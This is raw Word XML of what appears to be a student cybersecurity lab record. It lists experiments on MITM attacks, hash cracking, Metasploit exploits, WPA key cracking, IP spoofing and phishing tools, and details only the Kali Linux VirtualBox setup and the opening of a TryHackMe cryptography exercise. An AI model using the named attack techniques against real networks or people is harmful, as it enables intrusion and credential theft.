          <w:p w14:paraId="240A0CB3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restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3095E640" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00F45390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74027AFF" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30BC4FB2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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434A1A43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Encryption Crypto 101 in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TryHackMe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 xml:space="preserve"> Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDE4878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468EEC0D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54DD2474" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E35856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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064B37CE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Perform Man-in-the-middle (MITM) attacks using the Ettercap tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA89196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73E5E05C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4D1EA453" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42CC59DF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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A090C9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Demonstrate hash cracking using John the Ripper tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EDF4185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25E13E45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67BCD8FD" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B92D407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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADCDC2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Perform various configurations of Iptables Firewall in Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45F65BD8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172E5699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1DDC4E9F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52DD3E98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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB74183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Snort IDS/IPS to detect and prevent real time threats in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TryHackMe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 xml:space="preserve"> Platform.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D58EE77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07C14E0F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044B614F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27C0F3F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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305B37A6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Perform Code Injection on Application Process using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Ptrace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558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36729FA4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6663233A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102F7762" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AE0C32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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BAAA200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Privilege Escalation in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TryHackMe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 xml:space="preserve"> Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C15D21C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4C2A5C9B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6488EC21" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0803B29D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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E7D38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Demonstrate various exploits of Window OS using Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28A9C49F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13E8C98D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5B21A898" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73D799E2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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3137628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Perform Wireless Audit on routers and decrypt the WPA keys using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Aircrack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>-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34CB660D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7A16E37A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33B9958F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="354DB100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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008C286B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Perform IP Spoofing using a GitHub Tool (Educational Demonstration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BF73510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75BB7662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0394D497" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71AB6C3B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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5864191B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Study of Camera Phishing using Open-Source GitHub Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1323FC73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669880DF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66FB9711" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FAC55B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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1160EB1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Study of Phishing Attacks using Z-Phisher (GitHub Tool)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E272E83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50304609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36276635" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CDF522C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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E604A8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Study and Demonstration of Brute Force Password Attack in a Controlled Kali Linux Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F1745FA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4AE45F43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088C311" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="005425BC" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1340"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A707FB" w14:textId="6AEA0CCF" w:rsidR="00F44251" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF762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a"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text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F44251" w14:paraId="5E51EDCF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="168F5904" w14:textId="23BC3386" w:rsidR="00F44251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6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1456BB08" w14:textId="77777777" w:rsidR="00F44251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INSTALLATION OF KALI LINUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F44251" w14:paraId="0C103400" w14:textId="77777777" w:rsidTr="000F4FFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081CF81E" w14:textId="73EEFF27" w:rsidR="00F44251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A67492D" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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476F189E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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4A7AC3B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 xml:space="preserve">To install Kali Linux inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a pre-built VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87312C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50762160" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEB4926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STEP-BY-STEP INSTALLATION OF KALI LINUX IN VIRTUALBOX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03621884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0" w:name="_i01u74o4376v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Download and Install VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65532E0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Before you start, make sure VirtualBox is installed on your </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> computer. If you haven't installed it yet, follow these </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>steps :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4319DDF2" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Visit the VirtualBox Download Page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52645C1D" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Download the latest version for Windows hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E9E26" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Run the .exe file and follow the onscreen installation guide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75FAEF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" w:name="_ty3g8zwtog0s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Download Pre-Built Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2888A7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7D124D42" wp14:editId="422AD815">
            <wp:extent cx="5943600" cy="3098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41F3D" w14:textId="77777777" w:rsidR="00EF7625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D0F42BC" w14:textId="6DDFD325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Now, Download the pre-built virtual </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>machine :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D801EDA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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visit the official pre-built virtual machine download page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C9B70" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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choose the virtual machine version that is suitable for you and whichever you want like VirtualBox or VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553F679" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Download that file which contains a pre-built virtual machine and that file is in a 7zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4123512E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dnurdnxmbib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Extract downloaded pre-built virtual machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE27A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 will need the 7zip tool for extracting the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>file :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="057418A0" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Download 7zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E15545" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Right-click the downloaded Kali Linux 7z file and select `7-Zip` &gt; ' Extract Here '.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9109CE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ev69yctgn0e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Import the Extracted VM file in the VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331F4E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extracting the file with 7zip, you can import that virtual machine in VirtualBox by double clicking on that file or by following the below </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>steps :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E8D56A6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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open VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F420D92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0B08842" wp14:editId="70CC07D2">
            <wp:extent cx="5006340" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8" name="image6.png" descr="Screenshot-2024-06-01-213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Screenshot-2024-06-01-213427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6635" cy="1493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E3A3A" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24">
      <w:pPr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7E14964F" w14:textId="6531B4B4" w:rsidR="00F44251" w:rsidRDefault="00000000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i/>
          <w:iCs/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Oracle VM VirtualBox Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA04D3" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24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6F09C9A0" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24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4EDE4321" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24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190EEA8A" w14:textId="6C486F12" w:rsidR="00835F24" w:rsidRDefault="00835F24">
      <w:pPr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i/>
          <w:iCs/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9F58F" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F24">
      <w:pPr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76D76396" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Click on the add button and navigate to the directory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the extracted virtual machine is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40145A51" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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after selecting it click on the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D378CC2" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="00000000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0BA999B" wp14:editId="31A389DE">
            <wp:extent cx="5943600" cy="1498600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="image1.png" descr="Screenshot-2024-06-01-213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-2024-06-01-213809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CF017" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB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67D9B3C2" w14:textId="371FE264" w:rsidR="00F44251" w:rsidRDefault="00000000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i/>
          <w:iCs/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Kali Linux 2022.3 in Oracle VM VirtualBox Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E3D22" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB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25D20D9E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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After selecting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will see interface like this, click on the kali machine and then start button to start the virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06612EB5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yuokd37y8lun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Initial Setup of machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949941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pre-built virtual machine will be boot-up, and the initial setup will begin. Remember that the default credentials of the virtual machine </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>are :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76C33B5A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="288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Username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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8D558" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="288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Password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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD6F4E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2993D11D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E5921D9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the Kali Linux was successfully installed in VirtualBox using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PreBuilt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM.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b/>
          <w:bCs/>
        </w:rPr>
        <w:br/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0F4FFB" w14:paraId="3824343D" w14:textId="77777777" w:rsidTr="008608D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="05D3936D" w14:textId="7EAB6970" w:rsidR="000F4FFB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6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="20CB73BF" w14:textId="27338807" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4FF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4F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ENCRYPTION CRYPTO 101 IN TRYHACKME PLATFORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F4FFB" w14:paraId="7B7D7902" w14:textId="77777777" w:rsidTr="008608D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF4D76F" w14:textId="77777777" w:rsidR="000F4FFB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4EF99DE8" w14:textId="77777777" w:rsidR="000F4FFB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592BAC4A" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4FFB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27A837B" w14:textId="59BD0B93" w:rsidR="00F44251" w:rsidRDefault="000F4FFB" w:rsidP="000F4FFB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0F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the fundamentals of </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cryptography</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> by performing hands-on exercises in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crypto 101</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> room on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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platform, including basic encryption, encoding, hashing, and cryptographic concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70961FD9" w14:textId="4D348981" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FFB" w:rsidP="000F4FFB">
      <w:pPr>
        <w:spacing w:before="240"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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62276A" w14:textId="58275929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Web browser (Chrome / Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EF044" w14:textId="77777777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Internet connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4239D" w14:textId="77777777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account (free)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F71FBE" w14:textId="77777777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Built-in </w:t>
      </w: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terminal (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) or local Linux machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C218A6" w14:textId="77777777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m52z1qj6xdgi"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="74DB747F" w14:textId="7F7C8124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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>THEORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B5470" w14:textId="20FF1528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</w:rPr>
        <w:t>Cryptography is the practice of securing information by converting plain text into unreadable format (cipher text) using encryption techniques.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crypto 101</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduces basic concepts such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB34459" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRP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Encoding vs Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451E751" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRP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Symmetric and Asymmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523F83A" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRP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Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF68ED4" w14:textId="77777777" w:rsid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Common ciphers (Caesar, Base64, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC76C9E" w14:textId="77777777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155BE8F" w14:textId="63E7134C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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STEPS TO PERFORM THE EXPERIMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C58CE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Step 1: Login to </w:t>
      </w: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</w:p>
    <w:p w14:paraId="0A679D0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Open browser and go to: https://tryhackme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44009067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Login using your registered credentials.</w:t>
      </w:r>
    </w:p>
